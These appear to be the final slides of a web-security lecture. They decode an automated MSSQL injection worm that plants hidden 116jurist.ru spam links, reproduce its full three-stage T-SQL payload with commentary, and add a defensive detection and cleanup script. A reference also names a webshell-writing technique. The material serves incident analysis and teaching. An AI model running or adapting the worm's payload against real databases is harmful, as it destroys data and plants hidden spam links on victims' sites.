37. MSSQL real-world case: 116jurist.ru automated injection, decoded
(4/4)
• Stage 1, clean-up of any earlier copy: for every varchar/nvarchar/text/ntext column wider than 10 characters in a base table (text/ntext qualify too, since their CHARACTER_MAXIMUM_LENGTH is 2^31-1 / 2^30-1), cut the value back to just before the first '</title><' so the link is not appended twice on a re-infection. SET ANSI_WARNINGS OFF silences the string-truncation errors that would otherwise abort the batch. Note that the join ignores TABLE_SCHEMA, and any legitimate stored HTML that happens to contain '</title><' is truncated as collateral damage.
  set ansi_warnings off
  DECLARE @T VARCHAR(255),@C VARCHAR(255)
  DECLARE Table_Cursor CURSOR FOR
    select c.TABLE_NAME,c.COLUMN_NAME
    from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t
    where c.DATA_TYPE in ('nvarchar','varchar','ntext','text')
      and c.CHARACTER_MAXIMUM_LENGTH>10
      and t.table_name=c.table_name and t.table_type='BASE TABLE'
  OPEN Table_Cursor
  FETCH NEXT FROM Table_Cursor INTO @T,@C
  WHILE(@@FETCH_STATUS=0)
  BEGIN
    EXEC('UPDATE ['+@T+'] SET ['+@C+']=SUBSTRING(['+@C+'], 1, CHARINDEX(''</title><'',['+@C+']) - 1)
          where ['+@C+'] like ''%</title><%'' ')
    FETCH NEXT FROM Table_Cursor INTO @T,@C
  END
  CLOSE Table_Cursor
  DEALLOCATE Table_Cursor
• Stage 2, make room: widen every such column wider than 20 characters to varchar(8000) NOT NULL so the roughly 160-character HTML appended in stage 3 fits instead of being silently truncated (ANSI_WARNINGS is off). Side effects the worm does not care about: nvarchar/ntext data is converted to single-byte varchar, so non-Latin text in those columns is lost, and the ALTER fails on columns that hold NULLs or belong to a primary-key constraint; those errors end only the inner EXEC() batch, so the cursor simply moves on to the next column.
  set ansi_warnings off
  DECLARE @T VARCHAR(255),@C VARCHAR(255)
  DECLARE Table_Cursor CURSOR FOR
    select c.TABLE_NAME,c.COLUMN_NAME
    from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t
    where c.DATA_TYPE in ('nvarchar','varchar','ntext','text')
      and c.CHARACTER_MAXIMUM_LENGTH>20
      and t.table_name=c.table_name and t.table_type='BASE TABLE'
  OPEN Table_Cursor
  FETCH NEXT FROM Table_Cursor INTO @T,@C
  WHILE(@@FETCH_STATUS=0)
  BEGIN
    EXEC('ALTER TABLE ['+@T+'] ALTER COLUMN ['+@C+'] varchar(8000) NOT NULL')
    FETCH NEXT FROM Table_Cursor INTO @T,@C
  END
  CLOSE Table_Cursor
  DEALLOCATE Table_Cursor
• Stage 3, the payload: append a hidden link to every such column wider than 80 characters. CONVERT(VARCHAR(8000), ...) is required because text/ntext values cannot be concatenated with +. The leading '</title>' closes a <title> element in case the value is rendered there; position:absolute together with clip:rect(457px,auto,auto,457px) clips the div to nothing, so visitors see no change while crawlers index the outbound link (black-hat SEO). The anchor text is Windows-1251 Cyrillic, "юридические-услуги-москва" ("legal services Moscow"); read as Latin-1 it appears as "þðèäè÷åñêèå-óñëóãè-ìîñêâà", which is how it shows up in many dumps of infected sites.
  set ansi_warnings off
  DECLARE @T VARCHAR(255),@C VARCHAR(255)
  DECLARE Table_Cursor CURSOR FOR
    select c.TABLE_NAME,c.COLUMN_NAME
    from INFORMATION_SCHEMA.columns c, INFORMATION_SCHEMA.tables t
    where c.DATA_TYPE in ('nvarchar','varchar','ntext','text')
      and c.CHARACTER_MAXIMUM_LENGTH>80
      and t.table_name=c.table_name and t.table_type='BASE TABLE'
  OPEN Table_Cursor
  FETCH NEXT FROM Table_Cursor INTO @T,@C
  WHILE(@@FETCH_STATUS=0)
  BEGIN
    EXEC('UPDATE ['+@T+'] SET ['+@C+']=CONVERT(VARCHAR(8000),['+@C+'])+''</title><style>.a4tw{position:absolute;clip:rect(457px,auto,auto,457px);}</style><div class=a4tw><a href=http://116jurist.ru>юридические-услуги-москва</a></div>'' ')
    FETCH NEXT FROM Table_Cursor INTO @T,@C
  END
  CLOSE Table_Cursor
  DEALLOCATE Table_Cursor
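The three stages above are also the recipe for finding and undoing the infection. The T-SQL below is an added example, not part of the slide or the worm: it walks INFORMATION_SCHEMA the same way the worm does (but joins on schema as well as table name and quotes identifiers with QUOTENAME), counts rows per column that contain the 116jurist.ru link, and emits one reviewable UPDATE per hit that cuts the value back to just before the injected '</title><style>.a4tw{' marker rather than the worm's broader '</title><'. The marker and domain are taken from the decoded payload; the temp table name #hits and the variable names are this script's own assumptions.

```sql
-- Added example (not from the slide or the worm): hunt the 116jurist.ru injection in
-- every string column of the current database and generate a cleanup statement per hit.
SET NOCOUNT ON;
DECLARE @Marker NVARCHAR(100) = N'</title><style>.a4tw{';   -- start of the appended HTML
DECLARE @Domain NVARCHAR(100) = N'116jurist.ru';
DECLARE @Pat    NVARCHAR(200) = N'%' + @Domain + N'%';       -- sp_executesql needs a variable, not an expression

IF OBJECT_ID('tempdb..#hits') IS NOT NULL DROP TABLE #hits;   -- #hits: name chosen for this example
CREATE TABLE #hits (
    SchemaName SYSNAME, TableName SYSNAME, ColumnName SYSNAME, DataType SYSNAME,
    InfectedRows INT, CleanupSql NVARCHAR(MAX));

DECLARE @S SYSNAME, @T SYSNAME, @C SYSNAME, @D SYSNAME,
        @Col NVARCHAR(300), @Fix NVARCHAR(MAX), @sql NVARCHAR(MAX);

-- Same INFORMATION_SCHEMA walk the worm performs, joined on schema too so that two tables
-- with the same name in different schemas are not confused.
DECLARE cur CURSOR LOCAL FAST_FORWARD FOR
    SELECT c.TABLE_SCHEMA, c.TABLE_NAME, c.COLUMN_NAME, c.DATA_TYPE
    FROM INFORMATION_SCHEMA.COLUMNS c
    JOIN INFORMATION_SCHEMA.TABLES  t
      ON t.TABLE_SCHEMA = c.TABLE_SCHEMA AND t.TABLE_NAME = c.TABLE_NAME
    WHERE t.TABLE_TYPE = 'BASE TABLE'
      AND c.DATA_TYPE IN ('varchar', 'nvarchar', 'text', 'ntext');
OPEN cur;
FETCH NEXT FROM cur INTO @S, @T, @C, @D;
WHILE @@FETCH_STATUS = 0
BEGIN
    -- CAST to NVARCHAR(MAX): LEFT/CHARINDEX do not take legacy text/ntext, and after the
    -- worm's stage 2 some columns are varchar(8000) while untouched ones keep their old type.
    SET @Col = N'CAST(' + QUOTENAME(@C) + N' AS NVARCHAR(MAX))';

    -- Cleanup statement for this column: cut at the exact marker, only on rows that carry it.
    SET @Fix = N'UPDATE ' + QUOTENAME(@S) + N'.' + QUOTENAME(@T)
             + N' SET ' + QUOTENAME(@C) + N' = LEFT(' + @Col
             + N', CHARINDEX(N''' + @Marker + N''', ' + @Col + N') - 1)'
             + N' WHERE ' + @Col + N' LIKE N''%' + @Marker + N'%'';';

    -- Count infected rows and store the count next to the generated cleanup SQL.
    SET @sql = N'INSERT #hits SELECT @s, @t, @c, @d, COUNT(*), @fix FROM '
             + QUOTENAME(@S) + N'.' + QUOTENAME(@T)
             + N' WHERE ' + @Col + N' LIKE @pat';
    EXEC sp_executesql @sql,
         N'@s SYSNAME, @t SYSNAME, @c SYSNAME, @d SYSNAME, @fix NVARCHAR(MAX), @pat NVARCHAR(200)',
         @S, @T, @C, @D, @Fix, @Pat;

    FETCH NEXT FROM cur INTO @S, @T, @C, @D;
END
CLOSE cur; DEALLOCATE cur;

-- Review the list, take a backup, then run each CleanupSql inside a transaction.
SELECT SchemaName, TableName, ColumnName, DataType, InfectedRows, CleanupSql
FROM #hits
WHERE InfectedRows > 0
ORDER BY InfectedRows DESC;
```

The generated UPDATEs only reverse stage 3. Stage 2 is not reversible from the data: columns the worm converted from nvarchar/ntext to varchar(8000) NOT NULL must have their original type restored from the schema DDL, and any non-Latin text they held before the conversion is gone unless a backup predates the attack. The DataType column in the output shows which columns now read varchar where the application expects nvarchar.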
38. References
• Wu Hanqing (吳翰清), 網路竟然這麼危險 (白帽子讲Web安全, "White Hat Talks Web Security"), 2012
• MySQL 5.1 Reference Manual, String Functions
• MySQL 5.1 Reference Manual, Miscellaneous Functions
• MySQL/PHP: writing a one-line webshell (一句话) with load_file/outfile when single quotes are escaped
• Shazin Sadakath, Time Based SQL Injection using heavy queries in MySQL
• Stefan Esser, MySQL and SQL Column Truncation Vulnerabilities, 2008